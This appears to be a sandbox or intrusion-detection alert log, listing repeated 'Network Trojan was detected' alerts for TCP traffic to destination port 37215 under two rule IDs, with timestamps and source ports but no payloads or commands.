          Timestamp:06/08/24-15:05:30.164693
          SID:2835222
          Source Port:60172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.243038
          SID:2829579
          Source Port:60314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056624
          SID:2835222
          Source Port:36236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263791
          SID:2835222
          Source Port:59718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378324
          SID:2835222
          Source Port:45314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178067
          SID:2835222
          Source Port:55552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465574
          SID:2835222
          Source Port:44078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837382
          SID:2835222
          Source Port:43890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858158
          SID:2835222
          Source Port:37318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150308
          SID:2835222
          Source Port:59172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351122
          SID:2835222
          Source Port:53610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354764
          SID:2835222
          Source Port:45000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599971
          SID:2835222
          Source Port:37964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816361
          SID:2829579
          Source Port:39430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403132
          SID:2829579
          Source Port:45774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035778
          SID:2829579
          Source Port:38176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734263
          SID:2829579
          Source Port:47800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351562
          SID:2829579
          Source Port:34472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671390
          SID:2835222
          Source Port:58312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705882
          SID:2829579
          Source Port:34322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508488
          SID:2829579
          Source Port:53754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806974
          SID:2835222
          Source Port:39028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035077
          SID:2835222
          Source Port:59904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467785
          SID:2835222
          Source Port:60014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114541
          SID:2829579
          Source Port:42978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551642
          SID:2829579
          Source Port:51154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067771
          SID:2835222
          Source Port:55316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176273
          SID:2835222
          Source Port:47302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549843
          SID:2835222
          Source Port:46518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161360
          SID:2835222
          Source Port:38674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356202
          SID:2835222
          Source Port:44834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127439
          SID:2829579
          Source Port:59458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159053
          SID:2829579
          Source Port:48520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127168
          SID:2835222
          Source Port:43646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798804
          SID:2835222
          Source Port:59472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270009
          SID:2829579
          Source Port:45488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444013
          SID:2835222
          Source Port:33662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747919
          SID:2835222
          Source Port:57876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352611
          SID:2829579
          Source Port:38074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174685
          SID:2835222
          Source Port:56006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549251
          SID:2829579
          Source Port:51072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107544
          SID:2835222
          Source Port:33514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860115
          SID:2835222
          Source Port:46124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743046
          SID:2835222
          Source Port:55094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257584
          SID:2829579
          Source Port:42250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.170730
          SID:2829579
          Source Port:48610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732073
          SID:2835222
          Source Port:55242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172787
          SID:2835222
          Source Port:55424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893576
          SID:2829579
          Source Port:56112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239087
          SID:2829579
          Source Port:48598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106246
          SID:2835222
          Source Port:55282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160982
          SID:2835222
          Source Port:33238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042920
          SID:2835222
          Source Port:50634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669716
          SID:2835222
          Source Port:58960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.813318
          SID:2835222
          Source Port:58384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466200
          SID:2835222
          Source Port:38092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132866
          SID:2829579
          Source Port:45946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175831
          SID:2835222
          Source Port:60466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259572
          SID:2829579
          Source Port:45336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746814
          SID:2835222
          Source Port:42384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131193
          SID:2829579
          Source Port:42200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.799361
          SID:2829579
          Source Port:53546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820849
          SID:2829579
          Source Port:52508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782378
          SID:2835222
          Source Port:60352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151043
          SID:2835222
          Source Port:38366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668610
          SID:2829579
          Source Port:40146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787320
          SID:2829579
          Source Port:45302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160470
          SID:2829579
          Source Port:41082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466411
          SID:2835222
          Source Port:43628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110882
          SID:2835222
          Source Port:43162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177097
          SID:2829579
          Source Port:45036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554410
          SID:2835222
          Source Port:59752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817365
          SID:2835222
          Source Port:50550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406068
          SID:2829579
          Source Port:37392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740612
          SID:2835222
          Source Port:51204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671035
          SID:2829579
          Source Port:41216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128117
          SID:2829579
          Source Port:47138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854353
          SID:2829579
          Source Port:55974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179030
          SID:2829579
          Source Port:57076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462334
          SID:2835222
          Source Port:34794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099232
          SID:2835222
          Source Port:38452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.054856
          SID:2835222
          Source Port:49054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275385
          SID:2835222
          Source Port:50210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512954
          SID:2835222
          Source Port:48500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743850
          SID:2829579
          Source Port:59188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037121
          SID:2835222
          Source Port:39306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784472
          SID:2829579
          Source Port:60330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894138
          SID:2829579
          Source Port:46158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463216
          SID:2829579
          Source Port:52650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266081
          SID:2835222
          Source Port:36416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733987
          SID:2829579
          Source Port:37084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731321
          SID:2835222
          Source Port:32896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176519
          SID:2829579
          Source Port:37060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729426
          SID:2829579
          Source Port:48958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126900
          SID:2835222
          Source Port:45508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787085
          SID:2835222
          Source Port:46118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160564
          SID:2829579
          Source Port:48644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158602
          SID:2835222
          Source Port:56566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897018
          SID:2835222
          Source Port:49864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517531
          SID:2829579
          Source Port:43654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740955
          SID:2829579
          Source Port:48170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.518001
          SID:2829579
          Source Port:53846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463521
          SID:2835222
          Source Port:47512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158108
          SID:2829579
          Source Port:32784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853444
          SID:2835222
          Source Port:53556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057974
          SID:2835222
          Source Port:37854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793050
          SID:2829579
          Source Port:60102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.185564
          SID:2835222
          Source Port:58602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550733
          SID:2835222
          Source Port:56526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353290
          SID:2835222
          Source Port:40186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.843915
          SID:2835222
          Source Port:35536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067637
          SID:2829579
          Source Port:37378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275724
          SID:2829579
          Source Port:37048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808234
          SID:2829579
          Source Port:52672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549820
          SID:2829579
          Source Port:58518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179801
          SID:2829579
          Source Port:60560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127371
          SID:2829579
          Source Port:49060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017029
          SID:2829579
          Source Port:59806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273290
          SID:2829579
          Source Port:54462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463530
          SID:2829579
          Source Port:38814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039440
          SID:2835222
          Source Port:58892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731303
          SID:2829579
          Source Port:55964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236796
          SID:2835222
          Source Port:48146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176611
          SID:2829579
          Source Port:37100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744723
          SID:2835222
          Source Port:49716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.185534
          SID:2835222
          Source Port:40950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150395
          SID:2829579
          Source Port:58550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.117852
          SID:2829579
          Source Port:46318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180012
          SID:2829579
          Source Port:56662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160776
          SID:2829579
          Source Port:34090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465680
          SID:2829579
          Source Port:42742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038161
          SID:2829579
          Source Port:53282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837343
          SID:2835222
          Source Port:47572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.161770
          SID:2829579
          Source Port:52224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.465819
          SID:2835222
          Source Port:38518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894585
          SID:2829579
          Source Port:56046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815542
          SID:2829579
          Source Port:36752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242790
          SID:2835222
          Source Port:41428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599765
          SID:2835222
          Source Port:60772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259183
          SID:2835222
          Source Port:45154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273097
          SID:2829579
          Source Port:48644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.827816
          SID:2829579
          Source Port:47442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041378
          SID:2835222
          Source Port:41208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602306
          SID:2835222
          Source Port:45144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704237
          SID:2829579
          Source Port:49852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059865
          SID:2835222
          Source Port:47874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786521
          SID:2829579
          Source Port:54526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810410
          SID:2835222
          Source Port:57448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449069
          SID:2829579
          Source Port:50804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239389
          SID:2835222
          Source Port:36958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112164
          SID:2835222
          Source Port:37746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166719
          SID:2829579
          Source Port:56190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730308
          SID:2829579
          Source Port:37974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897509
          SID:2835222
          Source Port:45824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157632
          SID:2835222
          Source Port:42494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442104
          SID:2829579
          Source Port:33238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162776
          SID:2835222
          Source Port:41940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378085
          SID:2835222
          Source Port:59124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738477
          SID:2835222
          Source Port:52862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158650
          SID:2829579
          Source Port:37392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158052
          SID:2835222
          Source Port:56464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157029
          SID:2829579
          Source Port:48122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.154779
          SID:2835222
          Source Port:47332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108702
          SID:2829579
          Source Port:59794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599885
          SID:2829579
          Source Port:57832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115266
          SID:2835222
          Source Port:48780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730572
          SID:2829579
          Source Port:53224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264596
          SID:2835222
          Source Port:54230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603030
          SID:2829579
          Source Port:46586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729603
          SID:2835222
          Source Port:55156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238386
          SID:2835222
          Source Port:56044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.823799
          SID:2835222
          Source Port:37802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019858
          SID:2835222
          Source Port:51372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516350
          SID:2835222
          Source Port:59562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266302
          SID:2835222
          Source Port:34748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353324
          SID:2835222
          Source Port:48272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793537
          SID:2835222
          Source Port:48826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894423
          SID:2835222
          Source Port:56242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108029
          SID:2829579
          Source Port:60842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741448
          SID:2829579
          Source Port:38528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176068
          SID:2835222
          Source Port:54874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461547
          SID:2835222
          Source Port:49390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738381
          SID:2829579
          Source Port:42452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263950
          SID:2835222
          Source Port:47990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671895
          SID:2835222
          Source Port:43962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158975
          SID:2835222
          Source Port:58514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355728
          SID:2829579
          Source Port:41688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517337
          SID:2829579
          Source Port:56994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113547
          SID:2829579
          Source Port:33940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.070795
          SID:2835222
          Source Port:41084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037210
          SID:2835222
          Source Port:45240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042920
          SID:2835222
          Source Port:34484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162656
          SID:2829579
          Source Port:55074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239712
          SID:2835222
          Source Port:42078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179967
          SID:2835222
          Source Port:54968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466883
          SID:2829579
          Source Port:55412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747642
          SID:2829579
          Source Port:43126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039151
